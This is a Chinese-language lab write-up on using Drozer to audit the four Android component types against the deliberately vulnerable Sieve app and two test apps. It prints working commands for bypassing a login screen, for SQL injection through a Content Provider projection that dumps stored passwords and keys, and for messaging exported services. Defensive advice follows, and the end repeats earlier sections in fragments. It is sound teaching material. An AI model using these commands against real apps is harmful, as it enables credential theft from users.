Android四大组件安全审计与Drozer工具使用指南<\/h1>

一、实验概述<\/h2>
本实验使用Drozer工具对Android应用的四大组件（Activity、Service、Content Provider、Broadcast Receiver）进行安全审计，发现潜在的安全漏洞。<\/p>

二、实验环境准备<\/h2>

基础环境<\/h3>

操作系统：Windows 10<\/li>
开发工具：Android Studio 3<\/li>
Python版本：2.7 (32位)<\/li>

Drozer版本：2.4.4<\/li> <\/ul>

测试目标应用<\/h3>

Sieve（密码管理应用）<\/li>
Vul_BroadcastReceiver（广播接收器测试应用）<\/li>

AuditActivity（自定义测试应用）<\/li> <\/ul>

模拟器<\/h3>

海马玩模拟器 0.11.0<\/li> <\/ul>

三、Drozer环境配置<\/h2>

安装Drozer agent到测试设备<\/li>

配置端口转发：

adb forward tcp:31415 tcp:31415
<\/code><\/pre>
<\/li>
启动Drozer控制台：
drozer console connect
<\/code><\/pre>
<\/li>
<\/ol>
四、基础信息收集<\/h2>
1. 获取应用包信息<\/h3>
run app.package.list -f sieve
run app.package.info -a com.mwr.example.sieve
<\/code><\/pre>
2. 确定攻击面<\/h3>
run app.package.attacksurface com.mwr.example.sieve
<\/code><\/pre>
输出显示：<\/p>

3个导出的Activities<\/li>
2个导出的Content Providers<\/li>
2个导出的Services<\/li>
<\/ul>
五、Activity组件审计<\/h2>
1. 获取Activity信息<\/h3>
run app.activity.info -a com.mwr.example.sieve
<\/code><\/pre>
典型输出：<\/p>

FileSelectActivity（文件选择相关）<\/li>
PWList（密码列表相关）<\/li>
MainLoginActivity（主登录界面）<\/li>
<\/ul>
2. Activity绕过测试<\/h3>
尝试直接启动未受保护的Activity：<\/p>
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.FileSelectActivity
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
<\/code><\/pre>
成功绕过登录界面直接访问密码列表，但操作时应用崩溃。<\/p>
六、Content Provider组件审计<\/h2>
1. 获取Content Provider信息<\/h3>
run app.provider.info -a com.mwr.example.sieve
<\/code><\/pre>
2. 检测SQL注入漏洞<\/h3>
run scanner.provider.injection -a com.mwr.example.sieve
<\/code><\/pre>
发现两处可注入点。<\/p>
3. 执行SQL注入攻击<\/h3>
获取数据库表结构：<\/p>
run app.provider.query content:\/\/com.mwr.example.sieve.DBContentProvider\/Keys\/ --projection "* from sqlite_master where type='table';--"
<\/code><\/pre>
发现三张表：<\/p>

android_metadata<\/li>
Passwords<\/li>
Key<\/li>
<\/ul>
4. 提取敏感数据<\/h3>
读取Passwords表：<\/p>
run app.provider.query content:\/\/com.mwr.example.sieve.DBContentProvider\/Keys\/ --projection "* from Passwords;--"
<\/code><\/pre>
读取Key表：<\/p>
run app.provider.query content:\/\/com.mwr.example.sieve.DBContentProvider\/Keys\/ --projection "* from Key;--"
<\/code><\/pre>
成功获取用户名、密码、邮箱等敏感信息。<\/p>
七、Service组件审计<\/h2>
1. 获取Service信息<\/h3>
run app.service.info -a com.mwr.example.sieve
<\/code><\/pre>
发现两个Service：<\/p>

AuthService<\/li>
CryptoService<\/li>
<\/ul>
2. 测试AuthService<\/h3>
发送消息获取密码：<\/p>
run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 0 --extra string com.mwr.example.sieve.PIN 1234 --bundle-as-obj
<\/code><\/pre>
使用错误PIN码测试：<\/p>
run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 0 --extra string com.mwr.example.sieve.PIN 1111 --bundle-as-obj
<\/code><\/pre>
3. 测试CryptoService<\/h3>
执行加密操作：<\/p>
run app.service.send com.mwr.example.sieve com.mwr.example.sieve.CryptoService --msg 3452 0 0 --extra string com.mwr.example.sieve.KEY qwe123qwe123 --extra string com.mwr.example.sieve.STRING 1234 --bundle-as-obj
<\/code><\/pre>
八、Broadcast Receiver组件审计<\/h2>
使用Vul_BroadcastReceiver应用进行测试：<\/p>

通过logcat观察广播接收情况<\/li>
发送测试广播：<\/li>
<\/ol>
run app.broadcast.send --component com.isi.vul_broadcastreceiver com.isi.vul_broadcastreceiver.MyBroadCastReceiver --extra string number 666666
<\/code><\/pre>
九、自定义应用测试<\/h2>
1. 测试应用代码结构<\/h3>
public<\/span> class<\/span> MainActivity<\/span> extends<\/span> AppCompatActivity {<\/span>
<\/span><\/span>    \/\/ 登录逻辑
<\/span><\/span><\/span><\/span>    if<\/span>(<\/span>uname.<\/span>equals<\/span>(<\/span>"admin"<\/span>)<\/span> &&<\/span> pwd.<\/span>equals<\/span>(<\/span>"admin"<\/span>)){<\/span>
<\/span><\/span>        Intent intent=<\/span>new<\/span> Intent();<\/span>
<\/span><\/span>        intent.<\/span>setClass<\/span>(<\/span>MainActivity.<\/span>this<\/span>,<\/span> MyinfoActivity.<\/span>class<\/span>);<\/span>
<\/span><\/span>        startActivity(<\/span>intent);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> MyinfoActivity<\/span> extends<\/span> AppCompatActivity {<\/span>
<\/span><\/span>    \/\/ 显示用户信息
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 安全测试步骤<\/h3>

获取应用信息：<\/li>
<\/ol>
run app.package.info -f test0
<\/code><\/pre>

检查攻击面：<\/li>
<\/ol>
run app.package.attacksurface com.example.test0.auditactivity
<\/code><\/pre>

尝试绕过登录：<\/li>
<\/ol>
run app.activity.start --component com.example.test0.auditactivity com.example.test0.auditactivity.MyinfoActivity
<\/code><\/pre>
十、安全风险分析与防护建议<\/h2>
1. 主要安全问题<\/h3>

组件导出风险：未受保护的导出组件可被外部应用调用<\/li>
SQL注入漏洞：Content Provider未对输入进行过滤<\/li>
认证绕过：Activity未进行有效权限检查<\/li>
敏感数据泄露：Service可能返回敏感信息<\/li>
<\/ul>
2. 防护措施<\/h3>

最小化组件导出：
<activity<\/span> android:name=<\/span>".MyActivity"<\/span> android:exported=<\/span>"false"<\/span>\/><\/span>
<\/span><\/span><\/code><\/pre><\/li>
Content Provider防护：

使用参数化查询<\/li>
设置适当的读写权限<\/li>
<\/ul>
<\/li>
Service防护：

实现权限检查<\/li>
限制敏感操作<\/li>
<\/ul>
<\/li>
Broadcast Receiver防护：

设置权限要求<\/li>
验证广播来源<\/li>
<\/ul>
<\/li>
<\/ol>
十一、Drozer常用命令总结<\/h2>



命令类别<\/th>
命令示例<\/th>
功能描述<\/th>
<\/tr>
<\/thead>


包信息<\/td>
run app.package.list -f 关键词<\/code><\/td>
查找应用包名<\/td>
<\/tr>

攻击面<\/td>
run app.package.attacksurface 包名<\/code><\/td>
分析应用攻击面<\/td>
<\/tr>

Activity<\/td>
run app.activity.info -a 包名<\/code><\/td>
获取Activity信息<\/td>
<\/tr>

Activity<\/td>
run app.activity.start --component 包名 Activity类名<\/code><\/td>
启动Activity<\/td>
<\/tr>

Provider<\/td>
run app.provider.info -a 包名<\/code><\/td>
获取Content Provider信息<\/td>
<\/tr>

Provider<\/td>
run scanner.provider.injection -a 包名<\/code><\/td>
检测SQL注入漏洞<\/td>
<\/tr>

Provider<\/td>
run app.provider.query URI --projection "SQL"<\/code><\/td>
执行SQL查询<\/td>
<\/tr>

Service<\/td>
run app.service.info -a 包名<\/code><\/td>
获取Service信息<\/td>
<\/tr>

Service<\/td>
run app.service.send 包名 Service类名 --msg ...<\/code><\/td>
向Service发送消息<\/td>
<\/tr>

Broadcast<\/td>
run app.broadcast.send --component 包名 Receiver类名<\/code><\/td>
发送广播<\/td>
<\/tr>
<\/tbody>
<\/table>
十二、实验总结<\/h2>
通过本实验，我们掌握了使用Drozer工具对Android四大组件进行安全审计的方法，发现了多种常见的安全漏洞。开发人员应特别注意：<\/p>

严格控制组件的导出属性<\/li>
对所有输入进行严格验证<\/li>
实现适当的权限控制机制<\/li>
避免在组件中存储或传输敏感信息<\/li>
<\/ol>
安全审计应成为Android应用开发流程中的必要环节，特别是在处理用户敏感数据的应用中。<\/p>

命令类别<\/th>	命令示例<\/th>	功能描述<\/th> <\/tr> <\/thead>
包信息<\/td>	`run app.package.list -f 关键词<\/code><\/td>`	查找应用包名<\/td> <\/tr>
攻击面<\/td>	`run app.package.attacksurface 包名<\/code><\/td>`	分析应用攻击面<\/td> <\/tr>
Activity<\/td>	`run app.activity.info -a 包名<\/code><\/td>`	获取Activity信息<\/td> <\/tr>
Activity<\/td>	`run app.activity.start --component 包名 Activity类名<\/code><\/td>`	启动Activity<\/td> <\/tr>
Provider<\/td>	`run app.provider.info -a 包名<\/code><\/td>`	获取Content Provider信息<\/td> <\/tr>
Provider<\/td>	`run scanner.provider.injection -a 包名<\/code><\/td>`	检测SQL注入漏洞<\/td> <\/tr>
Provider<\/td>	`run app.provider.query URI --projection "SQL"<\/code><\/td>`	执行SQL查询<\/td> <\/tr>
Service<\/td>	`run app.service.info -a 包名<\/code><\/td>`	获取Service信息<\/td> <\/tr>
Service<\/td>	`run app.service.send 包名 Service类名 --msg ...<\/code><\/td>`	向Service发送消息<\/td> <\/tr>
Broadcast<\/td>	`run app.broadcast.send --component 包名 Receiver类名<\/code><\/td>`	发送广播<\/td> <\/tr> <\/tbody> <\/table> 十二、实验总结<\/h2> 通过本实验，我们掌握了使用Drozer工具对Android四大组件进行安全审计的方法，发现了多种常见的安全漏洞。开发人员应特别注意：<\/p> 严格控制组件的导出属性<\/li> 对所有输入进行严格验证<\/li> 实现适当的权限控制机制<\/li> 避免在组件中存储或传输敏感信息<\/li> <\/ol> 安全审计应成为Android应用开发流程中的必要环节，特别是在处理用户敏感数据的应用中。<\/p>

Android四大组件安全审计与Drozer工具使用指南<\/h1>

一、实验概述<\/h2> 本实验使用Drozer工具对Android应用的四大组件（Activity、Service、Content Provider、Broadcast Receiver）进行安全审计，发现潜在的安全漏洞。<\/p>

二、实验环境准备<\/h2>

四、基础信息收集<\/h2>

五、Activity组件审计<\/h2>

六、Content Provider组件审计<\/h2>

七、Service组件审计<\/h2>

九、自定义应用测试<\/h2>

十、安全风险分析与防护建议<\/h2>

一、实验概述<\/h2>
本实验使用Drozer工具对Android应用的四大组件（Activity、Service、Content Provider、Broadcast Receiver）进行安全审计，发现潜在的安全漏洞。<\/p>